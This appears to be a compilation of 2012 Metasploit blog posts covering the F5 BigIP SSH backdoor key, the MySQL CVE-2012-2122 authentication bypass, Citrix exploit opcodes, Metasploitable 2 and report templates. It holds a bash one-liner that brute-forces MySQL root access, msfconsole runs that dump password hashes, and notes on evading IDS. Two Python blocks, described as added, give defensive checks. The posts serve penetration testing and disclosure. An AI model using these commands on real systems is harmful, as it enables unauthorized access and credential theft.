This video covers accessing a web site that is normally unreachable from our Backtrack 5 box. However, after gaining a session on a third box, we forward our web browser through the compromised host in order to browse the website. The port forwarding is done via a meterpreter session on the compromised host. After setting up the port forward, the browser is able to use the compromised host as a relay (almost like a web proxy) in order to browse to the "internal" web application.

 

In previous versions of Metasploit it was possible to run "db_autopwn -t -x" in msfconsole in order to have Metasploit guess the best exploits for a given vulnerability.

 

This video looks at alternative functionality for the deprecated "db_autopwn -t -x" option in older versions of Metasploit's msfconsole. Metasploit Community Edition has similar exploit analysis functionality accessible via the web-based GUI.

 

This video shows how to have the hashdump post-exploitation module automatically populate the creds table in the Metasploit database, then export the credentials to a file suitable for passing to John the Ripper in order to audit the passwords.

 

Hu

This video covers importing the completed Nessus scan into Metasploit Community Edition.

 

When it rains, it pours. We released Metasploitable Version 2, published a technique for scanning vulnerable F5 gear, and put out a module to exploit MySQL's tragically comic authentication bypass problem, all in addition to cooking up this week's update. So, kind of a busy week around here. You're welcome. (:

 

Encrypted Java Meterpreter

 

This week's update features Michael Schierl's much anticipated cryptographic update to Java Meterpreter. Now, when using the default Java Meterpreter payload, users can specify an "AESPassword" option, which will encrypt all post-exploit communication with the Java Meterpreter payload. To illustrate, post-exploitation packet captures will go from this, to this.

 

This should make life a little more challenging for our IDS/IPS signature writing friends, and make Java Meterpreter sessions a little more reliable for penetration testers.

 

Once we've kicked this new encryption mode around for a couple of weeks and made sure everything's copacetic, I expect to have this option enabled by default for Java exploits.

 

Ye Olde Tyme Vulnerabilitys

 

This week's update also features something old -- specifically, open source contributor Patrick's modules for Microsoft Data Access Components (MDAC) vulnerabilities from yesteryear. Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow and Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution both target older IIS installations -- issues MS02-065 and MS98-004, respectively. Veteran penetration testers will recognize these Microsoft bulletin numbers from countless vulnerability reports. Just seeing MS98-004 mentioned in a new module makes me misty for the old days.

 

Having exploits handy for older vulnerabilities like this can be hugely useful. While it might be a foregone conclusion today that there is no way to secure a given NT 4.0 machine effectively, these modules make it much easier to actually prove it to your client.

 

Other New Modules

 

Finally, we have a slew of new modules -- thanks again to our community of open source security contributors for the diverse set of exploits this week.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

hdmoore

Introducing Metasploitable 2!

Posted by hdmoore Jun 13, 2012

Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable applications. I am happy to announce the release of Metasploitable 2, an even better punching bag for security tools like Metasploit, and a great way to practice exploiting vulnerabilities that you might find in a production environment.

 

For download links and a walkthrough of some of the vulnerabilities (and how to exploit them), please take a look at the Metasploitable 2 Exploitability Guide.

 

Have fun!

 

-HD

Metasploit Pro has a powerful reporting engine with many standard reports but also great ways to build your own reports. Custom reports can help you in a couple of different ways:

 

  • Add your logo and corporate design to reports
  • Change the way reports display the information
  • Translate a reporting template to your local language
  • Create new reports for regional compliance needs

 

A custom report is a report that you generate from a template. You can generate a custom report with a template that you created or with a Metasploit Pro custom template.

 

Metasploit Pro provides default JRXML templates that you can use to customize a template. The templates include a default template and a simple template. To build a custom template, you should download a Metasploit Pro template and use the template as a starting point for the custom template.

 

To customize a report template, you must be familiar with Jasper iReports, JasperReports, XML, Java, and SQL.

 

JasperReports

 

JasperReports is an open source Java based reporting engine, or library, that Metasploit Pro uses to generate standard and custom reports. Metasploit Pro builds reports with the JasperReports reporting format, JRXML.

 

How JasperReports Works

 

JasperReports operates similarly to a compiler. You create a JRXML file, which defines the instructions that determine where the report places text, puts images, and retrieves data. The Jasper compiler compiles the JRXML file to generate a report. After you have a compiled report, the Jasper engine accesses the data source to pull data for the report. The combination of the data source and a Jasper report enables you to produce an actual report in PDF, HTML, RTF, and Word.

 

For more information on JasperReports, visit http://jasperforge.org/projects/jasperreports.

 

Jasper iReport

 

If you want to easily create a custom report template, you can use a GUI based program like Jasper iReport to design the layout and appearance of the template. Jasper iReport is the open source report designer that is available from JasperReports. With Jasper iReport, you can visually design reports without knowledge of the JasperReports library, XML, and Java. The easiest way to create a custom template is to use the simple template that is available in Metasploit Pro as a starting point. The simple template uses Jasper iReport’s default template and uses a single SQL query to create a table of host machines and a count of the services and vulnerabilities that are available for each host.

 

Data Source Parameters

 

You can use data source parameters to define SQL queries to a database. The SQL queries that you define determine the data that displays in the report. To build a report template, you must include the workspace_id parameter. The workspace_id parameter populates the report with data that is relevant for the current project.

 

In iReport, when you define the query that the report engine uses to retrieve the database fields, you must pass the workspace_id parameter as part of a WHERE clause in the SQL statement that populates the data source. For example, you can enter SELECT * FROM hosts WHERE workspace_id = $P{workspace_id} to select the discovered hosts for a specific project.

 

Downloading the Simple or Default Template

 

  1. Open a project.
  2. Click the Reports tab. The Reports window appears.
  3. Click on the Download Default Template or Download Simple Template download links below the Saved Reports and Data Exports area.
  4. Save the template to a location on your computer.

 

Uploading a Custom Template

 

The custom template must have a JRXML (Jasper file) extension.

 

  1. Open a project.
  2. Click the Reports tab. The Reports window appears.
  3. Click Upload Custom Report Collateral.
  4. Browse to the location of the custom report template and select the template. Click Open.
  5. Enter a descriptive name for the template.
  6. Upload the template. The template appears under the Custom Templates and Logos area. You can choose the template when you create a custom report.

 

Uploading a Logo for Custom Reports

 

You can upload a logo to a project. The logos that you upload are globally available for you to add to any report that you generate within the project.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Click Upload Custom Report Collateral.
  5. Click Browse and locate the logo file that you want to upload. Metasploit Pro supports GIF, JPEG, JPG, and PNG files.
  6. Enter a name for the file.
  7. Upload the file. The file appears under the Custom Templates and Logos area.

 

You can choose the logo file when you create a custom report.

 

Adding a Logo to a Custom Report

 

You can add a custom logo to a report. The custom logo that you use replaces the default Rapid7 logo on the cover page and footer of the report.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Choose a custom report format. You can choose PDF, Word, RTF, or HTML to generate the report.
  5. Enter a name for the report. You can enter up to 63 characters and use alphanumeric characters, dashes, hyphens, periods, and spaces.
  6. Specify the hosts that you want the report to include and exclude.
  7. Click the Custom report logo dropdown and select the logo that you want to use.
  8. Select the report sections that you want to include in the report.
  9. Choose if you want to include detailed information for each session action.
  10. Choose if you want to include charts and graphs in the report.
  11. Generate the report. All generated reports appear under the Saved Reports and Data Exports area.

 

Creating a Custom Report

 

Before you can create a custom report, you must upload a custom template to Metasploit Pro. Additionally, if you want to include a logo in the report, you must upload the GIF, JPEG, JPG, or PNG file for the image.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Choose a custom report format. You can choose PDF, Word, RTF, or HTML to generate the report.
  5. Enter a name for the report. You can enter up to 63 characters and use alphanumeric characters, dashes, hyphens, periods, and spaces.
  6. Specify the hosts that you want the report to include and exclude.
  7. Choose the custom report template that you want to use to generate the report.
  8. Select the report sections that you want to include in the report.
  9. Choose if you want to include detailed information for each session action.
  10. Choose if you want to include charts and graphs in the report.
  11. Generate the report. All generated reports appear under the Saved Reports and Data Exports area.

 

If you'd like to try customizing your reports, download Metasploit and start your free trial of Metasploit Pro.

This morning Matta Consulting posted an advisory for the F5 BigIP equipment. The advisory states that certain BigIP devices contain an SSH private key on their filesystem that is trusted for remote root access on every other BigIP appliance. Although Matta did not provide the private key, they did provide the public key itself:

 

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser


F5 has published a patch for this issue, but you can bet that many users will be unaware of the issue, and even those that are aware may not want to take down their load balancer to apply it (applying the fix does not result in any downtime, as stated in the comments below). The private key is likely still on a large number of production appliances and any attacker with the access to a virtual or physical appliance can extract the key.


A quick review of my personal research project's data shows that it identified 7701 BigIP systems, 3409 of which have SSH open to the world. If this trend is representative (and it should be via random IP sampling), this puts the overall exposure at 43% of all F5 BigIP systems. Note that this sampling was for devices running Apache with the following string in the default page: "F5 Networks Configuration Utility" (not devices with a Server banner of BigIP, which had a much lower rate of SSH exposure).


One nifty feature within Metasploit is the ability to "half-scan" SSH servers with only the public key. This will tell us whether the server would accept authentication with that key, even if we do not possess the corresponding private key. This is a great way to ensure that a terminated employee's keys have been removed from your network and check for backdoor keys such as the one introduced accidentally by F5. We can use the public key from this advisory with the ssh_identify_pubkeys module to quickly identify any F5 equipment with this insecure key still in place. Once we get a copy of the private key, this will be used to add a full-on exploit module to Metasploit.


Metasploit Pro customers can quickly test all SSH servers identified in their current workspace. Just choose the Bruteforce component, set the Depth to "known only", select only the SSH-PUBKEY protocol, and under Advanced Options, paste the SSH public key into the Additional Credentials field. Launch the Bruteforce task and wait for it to complete. Any vulnerable systems will now have a public key credential associated with them in the Credentials tab of the host view and listed in the Authentication Tokens report.

 

Metasploit Framework and Pro command-line users can accomplish the same thing through the Metasploit console.

 

To get started, place the target SSH key into a text file on the local filesystem ("f5.pub") and launch msfconsole.


$ msfconsole

msf > use auxiliary/scanner/ssh/ssh_identify_pubkeys

msf  auxiliary(ssh_identify_pubkeys) > set USERNAME root

msf  auxiliary(ssh_identify_pubkeys) > set KEY_FILE f5.pub

msf  auxiliary(ssh_identify_pubkeys) > set RHOSTS 192.168.0.5

msf  auxiliary(ssh_identify_pubkeys) > run

 

[*] 192.168.0.5:22 SSH - Trying 1 cleartext key per user.

[+] 192.168.0.5:22 SSH - [1/1] - Accepted: 'root' with key '71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66' - SCCP Superuser

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed
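The scan above asks a live sshd whether it would accept the key; the complementary check a defender runs on the hosts themselves is to look for the same key in authorized_keys files. The script below is an added example (not part of the original post and not Metasploit code): it parses the advisory's public key, prints its MD5 fingerprint in the colon form the module output above uses, and searches constructed authorized_keys content for the same key blob. The F5 key is the one quoted above with its line-wrap spaces removed; the authorized_keys lines and the "alice@example" ed25519 entry are constructed.

```python
"""Added audit for a known-compromised SSH public key (the BIG-IP "SCCP Superuser" key
quoted above). Not part of the original post or of Metasploit."""
import base64
import hashlib
import struct

# Public key as quoted in the Matta advisory above, with the line-wrap spaces removed.
F5_SCCP_KEY = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJ"
    "T+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbK"
    "v58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser"
)

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _read_string(blob, pos):
    """Read one RFC 4251 'string' (uint32 big-endian length, then bytes) at pos."""
    (n,) = struct.unpack_from(">I", blob, pos)
    pos += 4
    if pos + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[pos:pos + n], pos + n


def parse_pubkey_line(line):
    """Parse 'ssh-rsa <base64> [comment]', optionally preceded by authorized_keys options
    such as no-pty or from="...". Returns (type, blob, comment), or None when the line
    holds no key. Quoted options containing spaces are not handled (a known simplification)."""
    parts = line.strip().split()
    for i, tok in enumerate(parts):
        if tok in KEY_TYPES and i + 1 < len(parts):
            blob = base64.b64decode(parts[i + 1], validate=True)
            embedded, _ = _read_string(blob, 0)
            if embedded != tok.encode("ascii"):
                raise ValueError("declared key type does not match the blob")
            return tok, blob, " ".join(parts[i + 2:])
    return None


def md5_fingerprint(blob):
    """Colon-separated MD5 fingerprint, the form the ssh_identify_pubkeys output above prints."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def rsa_components(blob):
    """Return (e, n) from an ssh-rsa blob laid out as string 'ssh-rsa', mpint e, mpint n."""
    _, pos = _read_string(blob, 0)
    e, pos = _read_string(blob, pos)
    n, pos = _read_string(blob, pos)
    if pos != len(blob):
        raise ValueError("trailing bytes after the RSA modulus")
    return int.from_bytes(e, "big"), int.from_bytes(n, "big")


def find_key(authorized_keys_text, bad_key_line):
    """Return the 1-based line numbers whose key blob equals the bad key's blob. Matching on
    the blob (what sshd compares) rather than the comment catches a renamed copy of the key."""
    _, wanted, _ = parse_pubkey_line(bad_key_line)
    hits = []
    for lineno, line in enumerate(authorized_keys_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        try:
            parsed = parse_pubkey_line(line)
        except (ValueError, struct.error):
            continue  # malformed entry; sshd skips such lines as well
        if parsed is not None and parsed[1] == wanted:
            hits.append(lineno)
    return hits


def sample_authorized_keys():
    """Constructed authorized_keys content (not from any real system): a comment, a made-up
    ed25519 entry, a blank line, and the F5 key behind an options prefix with a new comment."""
    fake_ed25519 = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))
    alice = "ssh-ed25519 " + base64.b64encode(fake_ed25519).decode() + " alice@example"
    _, f5_blob, _ = parse_pubkey_line(F5_SCCP_KEY)
    renamed = ('no-pty,from="10.0.0.0/8" ssh-rsa ' + base64.b64encode(f5_blob).decode()
               + " ops-backup")
    return "\n".join(["# constructed sample", alice, "", renamed]) + "\n"


if __name__ == "__main__":
    ktype, blob, comment = parse_pubkey_line(F5_SCCP_KEY)
    e, n = rsa_components(blob)
    print(f"{ktype} {n.bit_length()}-bit e={e} comment={comment!r} fp={md5_fingerprint(blob)}")
    print("matching lines in sample authorized_keys:",
          find_key(sample_authorized_keys(), F5_SCCP_KEY))
```

Pointing find_key() at the real files (every user's ~/.ssh/authorized_keys and any AuthorizedKeysFile paths from sshd_config) turns this into a host-side sweep for the key that the network scan above identifies from the outside.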


If you'd like to give this a try yourself, download Metasploit now.

 

Introduction

 

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

 

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

 

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>


 

Exploitability

 

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.
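The two paragraphs above describe the root cause (an int from memcmp() squeezed through a one-byte my_bool) and the need to test the platform rather than trust the version number. The block below is an added illustration, not MySQL's or Metasploit's code: the narrowed comparison beside the corrected one, a constructed word-wise memcmp() standing in for an optimized build so the 1-in-256 false accept can be counted, and a ctypes probe of the local C library's memcmp() return range in the spirit of the test application mentioned above (the probe reaches Python's libc, not the one a given mysqld binary was built against).

```python
"""Added illustration of the CVE-2012-2122 comparison bug; not MySQL's or Metasploit's code."""
import ctypes
import ctypes.util
import hashlib
import random

SHA1_HASH_SIZE = 20


def narrowed_my_bool(cmp_result):
    """Vulnerable shape: memcmp()'s int result is returned through MySQL's one-byte my_bool
    (a char), so only the low 8 bits survive. Any non-zero result that is a multiple of 256
    becomes 0, which the caller reads as "hashes match"."""
    return ((cmp_result & 0xFF) ^ 0x80) - 0x80


def fixed_my_bool(cmp_result):
    """Fixed shape: test against zero before the int is narrowed, so a mismatch stays non-zero."""
    return int(cmp_result != 0)


def wordwise_memcmp(a, b):
    """Constructed stand-in for an optimised memcmp() (not glibc's code): compares four bytes at
    a time and returns the difference of the first unequal big-endian words, so results are not
    confined to -128..127. A byte-at-a-time memcmp() returns the first byte difference instead."""
    if len(a) != len(b):
        raise ValueError("buffers must be the same length")
    for i in range(0, len(a), 4):
        wa = int.from_bytes(a[i:i + 4], "big")
        wb = int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            return wa - wb
    return 0


def password_accepted(check, stored_hash, candidate_hash):
    """MySQL's decision: a check_scramble() result of 0 means the password is accepted."""
    return check(wordwise_memcmp(stored_hash, candidate_hash)) == 0


def count_false_accepts(check, trials, seed=2012):
    """Count how many random *wrong* hashes the given check accepts against one stored hash.
    The narrowed check lets through roughly 1 in 256 (whenever the low byte of the first
    differing word happens to agree); the fixed check lets through none."""
    rng = random.Random(seed)
    stored = hashlib.sha1(b"correct horse battery staple").digest()  # constructed stage-2 hash
    accepted = 0
    for _ in range(trials):
        wrong = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        if wrong != stored and password_accepted(check, stored, wrong):
            accepted += 1
    return accepted


def libc_memcmp_result_range(length=SHA1_HASH_SIZE):
    """Probe the C library memcmp() this interpreter can reach through ctypes and return
    (min, max) of its results for buffers whose first byte differs by 0..255, or None when no
    libc is loadable. A bound outside -128..127 means this memcmp() is unsafe behind a char."""
    try:
        name = ctypes.util.find_library("c")
        libc = ctypes.CDLL(name) if name else ctypes.CDLL(None)
        memcmp = libc.memcmp
    except (OSError, AttributeError, TypeError):
        return None
    memcmp.restype = ctypes.c_int
    memcmp.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_size_t]
    results = [memcmp(bytes([0]) + bytes(length - 1), bytes([d]) + bytes(length - 1), length)
               for d in range(256)]
    return min(results), max(results)


if __name__ == "__main__":
    print("narrowed check false accepts / 65536:", count_false_accepts(narrowed_my_bool, 65536))
    print("fixed check false accepts / 65536:   ", count_false_accepts(fixed_my_bool, 65536))
    print("local libc memcmp() result range:    ", libc_memcmp_result_range())
```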

 

If you'd like to give this a try yourself, download Metasploit now for free.


So far, the following systems have been confirmed as vulnerable:

  • Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04) (via many including @michealc)
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log (via @michealc)
  • Debian Unstable 64-bit 5.5.23-2 (via @derickr)
  • Fedora (via hexed and confirmed by Red Hat)
  • Arch Linux (unspecified version)

 

Feedback so far indicates the following platforms are NOT vulnerable:

  • Official builds from MySQL and MariaDB (including Windows)
  • Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
  • CentOS using official RHEL rpms
  • Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
  • Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
  • Debian Linux lenny 32-bit 5.0.51a-24+lenny5 (via @matthewbloch)
  • Debian Linux lenny 64-bit 5.0.51a-24+lenny5 (via @matthewbloch)
  • Debian Linux lenny 64-bit 5.1.51-1-log (via @matthewbloch)
  • Debian Linux squeeze 64-bit 5.1.49-3-log (via @matthewbloch)
  • Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 (via @matthewbloch)
  • Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 (via @matthewbloch)
  • Gentoo 64-bit 5.1.62-r1 (via @twit4c)
  • SuSE 9.3 i586 MySQL 4.1.10a (via @twit4c)
  • OpenIndiana oi_151a4 5.1.37 (via @TamberP)
  • FreeBSD 64-bit (many versions)

 

 

Most Linux vendors should have a patch out soon, if not already.


 

Caveats and Defense

 

The first rule of securing MySQL is not to expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.



Real-world Version Information

 

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.

 

Host Access Control

 

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls (879,046 vs 863,920). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be "dark" or where the network administrators had opted out of the survey.

 

MySQL Version Numbers

 

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.



Making the Most of It

 

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored "loot" file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.

 

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf  auxiliary(mysql_authbypass_hashdump) > run

 

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


 


This week's update has a nice new asymmetric DoS condition module, a bunch of churn in Metasploit's Rails components, and some new Citrix attacks, so let's get right into it.

 

Fuzzing for Citrix Opcodes

 

This week's update includes three new exploits for Citrix Provisioning Services, the solution by Citrix "to stream a single desktop image to create multiple virtual desktops on one or more servers in a data center" (vendor quote). These modules exploit the same code JITED by the .NET Manager.dll component used by the StreamProcess.exe service (and patched in http://support.citrix.com/article/CTX130846):

0:012> kb
ChildEBP RetAddr  Args to Child
04d3f37c 012ba6c4 04d3f4d4 04e40042 ffffffff MSVCR90!wcsncpy [f:\dd\vctools\crt_bld\self_x86\crt\src\wcsncpy.c @ 43]
04d3f424 7c809bbf ffffffff 04d3f450 04d3f454 0x12ba6c4
04d3f444 7c809b89 ffffffff 04c20000 00010000 kernel32!VirtualFreeEx+0x37
04d3f45c 79e8d09b 04c20000 00000000 79e8d0b7 kernel32!VirtualFree+0x15
04d3f494 79e8d0cb 04c20000 00000000 00008000 mscorwks!EEVirtualFree+0x95
04d3f4a8 79082ba9 7a3bdc9c 04c20000 00000000 mscorwks!CExecutionEngine::ClrVirtualFree+0x11
04d3f4cc 79082b6d 790b0000 7907799d 790b7064 mscorjit!norls_allocator::nraToss+0x44
04d3f4d8 790b7064 00000000 79076f16 79065d56 mscorjit!norls_allocator::nraRlsm+0x13
04d3f4e0 79076f16 79065d56 70410543 00000000 mscorjit!___PchSym_+0x2c
04d3f588 79fc71b7 04d3f780 79fc71db 7045188c mscorjit!jitNativeCode+0x12f
04d3f5e4 79fc722d 001a6a28 04d3f738 04d3f6b0 mscorwks!invokeCompileMethodHelper+0x91
04d3f62c 79fc8da9 035d86fc 04c32830 00000571 mscorwks!invokeCompileMethod+0x31
04d3f66c 79f908a1 79fc357e 70451bf0 035d86fc mscorwks!CallCompileMethodWithSEHWrapper+0xaa
04d3fa18 001f0578 04d3fa54 79e7a14a 04d3faf0 mscorwks!Thread::StackWalkFramesEx+0x109
00000000 00000000 00000000 00000000 00000000 0x1f0578

 

With the new modules, now four different paths can be taken to exploit Citrix Provisioning Services. Two of the vulnerable opcodes were disclosed through ZDI advisories (0x40020000 and 0x40020006) while the other two (0x40020002 and 0x40020004) were posted as private exploits. With a little bit of fuzzing, Metasploit exploit developer Juan Vazquez was able to make streamprocess.exe crash with opcodes 0x40020002, 0x40020004, and 0x40020006. Combined with the awesome DEP bypass found by the contributor "Alino" (author of the citrix_streamprocess_data_msg.rb module which exploits the 0x40020000 opcode), we have all the known opcode paths available for Metasploit users.

 

Here's a complete list of available opcodes, obtained from disassembling the "Manager.dll" component:

 

seg000:1D558 Ardence.CManagerRequestReceiver.dispatchPacket
             ldc.i4 0x40020000
seg000:21803 Ardence.CProtocol.Build_MGR_VDISK_CREATE_REQUEST
             ldc.i4 0x4002000A
seg000:218E4 Ardence.CProtocol.GetMgrVdiskDeleteRequest
             ldc.i4 0x4002000B
seg000:218F4 Ardence.CProtocol.GetMgrVdiskDescribeContainerRequest
             ldc.i4 0x4002000F
seg000:21904 Ardence.CProtocol.GetMgrVdiskGetHeaderRequest
             ldc.i4 0x40020000
seg000:21915 Ardence.CProtocol.GetMgrVdiskSetHeaderRequest
             ldc.i4 0x40020001
seg000:21925 Ardence.CProtocol.GetMgrVdiskSetFooterRequest
             ldc.i4 0x40020003
seg000:21935 Ardence.CProtocol.GetMgrVdiskSetBootRecordRequest
             ldc.i4 0x40020005
seg000:21943 Ardence.CProtocol.Build_MGR_VDISK_LIST_REQUEST
             ldc.i4 0x4002000E
seg000:21973 Ardence.CProtocol.Build_MGR_VDISK_LIST_DIRECTORIES_REQUEST
            ldc.i4 0x40020019
seg000:219A3 Ardence.CProtocol.Build_MGR_VDISK_CREATE_DIRECTORY_REQUEST
            ldc.i4 0x4002001A
seg000:219C3 Ardence.CProtocol.Build_MGR_VDISK_REMOVE_DIRECTORY_REQUEST
            ldc.i4 0x4002001B
seg000:219EC Ardence.CProtocol.Build_MGR_VDISK_CHECK_SIDECAR_REQUEST
             ldc.i4 0x40020017
seg000:21AD3 Ardence.CProtocol.Build_MGR_VDISK_LOCK_REQUEST
             ldc.i4 0x40020010
seg000:21B33 Ardence.CProtocol.Build_MGR_VDISK_UNLOCK_REQUEST
             ldc.i4 0x40020011
seg000:21B84 Ardence.CProtocol.GetMgrVdiskIsLockedRequest
             ldc.i4 0x40020013
seg000:21B94 Ardence.CProtocol.GetMgrVdiskReleaseAllLocksRequest
             ldc.i4 0x40020012
seg000:21BA4 Ardence.CProtocol.GetMgrVdiskGetLockInfoRequest
             ldc.i4 0x40020014
seg000:21C04 Ardence.CProtocol.GetMgrVdiskGetFooterRequest
             ldc.i4 0x40020002
seg000:21C64 Ardence.CProtocol.GetMgrVdiskGetBootRecordRequest
             ldc.i4 0x40020004
seg000:21C73 Ardence.CProtocol.Build_MGR_VDISK_GET_OBJECTS_REQUEST
             ldc.i4 0x40020006
seg000:22314 Ardence.CProtocol.GetMgrVdiskCheckRequest
             ldc.i4 0x40020015
seg000:22325 Ardence.CProtocol.GetMgrVdiskCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2235C Ardence.CProtocol.Build_MGR_VDISK_DELETE_DEVICE_DISK_CACHE_FILE_REQUEST
             ldc.i4 0x40020018
seg000:2AE27 Ardence.CRemoteManagedVdisk.handleCreateRequest
             ldc.i4 0x4002000A
seg000:2B30D Ardence.CRemoteManagedVdisk.handleCancelCreateRequest
             ldc.i4 0x4002000C
seg000:2B65D Ardence.CRemoteManagedVdisk.handleGetCreateProgressRequest
            ldc.i4 0x4002000D
seg000:2BAFD Ardence.CRemoteManagedVdisk.handleDeleteRequest
             ldc.i4 0x4002000B
seg000:2BE3D Ardence.CRemoteManagedVdisk.handleDescribeContainerRequest
            ldc.i4 0x4002000F
seg000:2C18D Ardence.CRemoteManagedVdisk.handleGetBootRecordRequest
